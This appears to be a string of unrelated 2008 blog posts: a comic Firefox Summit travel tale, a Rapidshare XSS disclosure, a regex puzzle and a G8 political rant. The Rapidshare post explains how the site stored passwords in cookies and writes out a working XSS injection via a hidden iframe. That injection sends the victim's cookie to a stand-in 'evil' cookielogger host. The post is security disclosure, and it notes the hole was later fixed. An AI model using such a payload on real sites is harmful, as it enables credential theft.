As you’ve probably heard, the Firefox Summit 2008, albeit great for meeting face to face people I only knew through IRC or Bugzilla, has been quite challenging:

  1. Besieged by bears
  2. Cut away from the rest of the world by a crash bug in the Whistler-Vancouver communication module
  3. Lost in the dark because of a truck-based DOS attack

We must all thank Dan Portillo for the (much) good of the Summit he masterfully organized and for the great job he did in working around the issues listed above; on the other hand, they might perhaps have been prevented by choosing a less hazardous place, since “Whistler” was the code name for Microsoft Windows XP…

However, when last night, after a 36-hour trip, I was finally back in Palermo believing it was all over, I went to get my baggage back — including most of my t-shirts, 3 pairs of pants, 9 bottles of maple syrup for my relatives and friends — but… it obviously wasn’t there. OK, I should have expected some problems, since I also packed one of Wladimir Palant’s legs, which I had to smoke (on pure maple wood) the day of the power outage, before it started smelling inside my useless fridge.
After waiting about one hour because nobody in the airport could say whether the unloading operations were done yet (what about implementing a callback architecture or a notification bus?), I had to formally claim it lost and was given a link to a website for tracking the baggage recovery process.

So this morning I tried submitting this form, but I got redirected to a page showing the following error message:

Il sistema non può indviduare* una lima valida per la vostra entrata.

For those who don’t speak Italian (like the author of this disturbing text, I hope), this sounds like

The system cannot find a rasp suitable for your entrance.

As you can imagine, I was quite glad the system couldn’t ;)
Nonetheless, I still needed to know about the destiny of my baggage, so I retried on a clean profile: same result!
In the end I reluctantly switched the rendering engine through the IE Tab extension, and the system finally decided to be more collaborative: it reported there was no available tracking info yet, but at least it stopped threatening “my entrance” with steel tools.

At that point I checked all the browsers I’ve got at hand, with the following results:

  • Gecko-based: RASP
  • IE: OK
  • Lynx: RASP
  • Opera: OK
  • Safari: RASP

Before you ask: yes, I tried to fake my headers via the User Agent Switcher extension.
Any clue?

* this misspelling seems even to rule out a machine translation with no human intervention

You know, looks like the Firefox Summit 2008 is going to have a dramatic epilogue.
I’ve been sitting next to AdBlock Plus’ author all this afternoon, attending a couple of security-related sessions, and now I’m getting dangerously hungry…
Want to save your favourite adblocker? Try to file a bug depending on this one.

As nktpro graciously told us, the latest of several XSS vulnerabilities affecting Rapidshare is still unpatched, one month after it had been reported to the site owners.
But what can you expect from people who store both your username and password inside your cookie?
Yes, check it yourself: a Rapidshare cookie is something like user=12345-%36%37%38%39%30.
In JavaScript (standard function syntax; the original used Firefox’s expression-closure shorthand),
cookie = "username=" + login + "-" + pwd.replace(/./g, function (s) { return "%" + s.charCodeAt(0).toString(16); }); // each password char becomes "%" + its char code in hex

Therefore, for a given cookie, access credentials are just
var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);

This means that if I embed the following code on this blog post, or even better on the FlashGot homepage, visited by thousands of Rapidshare users, I own an insane lot of accounts in a blink:

var injection = "<script>(" + (function() {
new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +
escape(document.cookie);
}) + ")()</scr" + "ipt>"
var iframe = document.body.appendChild(document.createElement("iframe"));
iframe.style.visibility = "hidden";
iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +
encodeURIComponent(injection);

But luckily, no Rapidshare user would ever visit those shady p0rn/w4r3z sites… ;)

Update

Fixed on 6 Aug 2008.

OK, Dustin Diaz (via Paul O’Shannessy) managed to delay my lunch by 30 secs.

var arr = ['a', 'b', 'c', 'c', 'd','e', 'e',
'e', 'e', 'e', 'f', 'e', 'f', 'e',
'f', 'a', 'a', 'a', 'f', 'f', 'f'];
var solution='a b c c d e e <span>e e e</span> f e f e f a a <span>a</span> f f <span>f</span>';
// Wrap everything after the second item of each run of three or more equal letters in a <span>.
var won = arr.join(' ').replace(/((\w)\s\2\s)((?:\2\s?)+)(?=\s|$)/g, '$1<span>$3</span>') == solution;

Thanks to the wonderful interactive environment of Firefox’s “Error Console” (formerly known as JavaScript Console), my pasta didn’t get too cold :)

So the Hokkaido G8 has food security, climate change and oil prices in a prominent place on its agenda.

Bush has made accountability a major theme for this year’s G8 meetings, arguing that “we need people who not only make promises, but write checks, for the sake of human rights and human dignity, and for the sake of peace.” The G8 includes Britain, Canada, France, Germany, Italy, Japan, Russia and the United States.

G8 leaders are expected to address an array of political, security and economic issues when they meet for three days. “We expect that they will discuss a broad range of issues, including development, Africa, food security, trade and investment policy, energy security, climate change and issues relating to the global economy, including oil prices.

Obviously, we expect the very same people who became insanely rich thanks to these “issues” [1] to clean up their profitable mess and save the world.

We expect politicians whose career and position is entirely built upon terror to fight it.
We expect governments driven by ruthless corporate interests to regulate for a planet-sustainable economy, which may require profit margin reductions or even degrowth [2].
We expect oil companies, mercenary armies, reconstruction contractors and weapon manufacturers, which, rather than bribing the people’s elected representatives as they used to do in the past, nowadays have their executives placed directly in key government roles as an obscene parody of democracy, to shoot themselves in the foot.

Just like expecting anti-virus vendors to push technologies and approaches that make our information systems really safer, or Microsoft to promote open (web) standards.

Notes

[1] An interesting and very well documented paper titled Who benefits from GM crops: the rise in pesticide use explains clearly how technologies advertised as a remedy against world hunger are, in reality, making the problem far worse.

[2] The linked article is the first Google Search result in English for “Degrowth”, and likely a good introductory resource. While both Italian and French Wikipedia sites have articles about this topic, I could not find anything on the English site. Why?
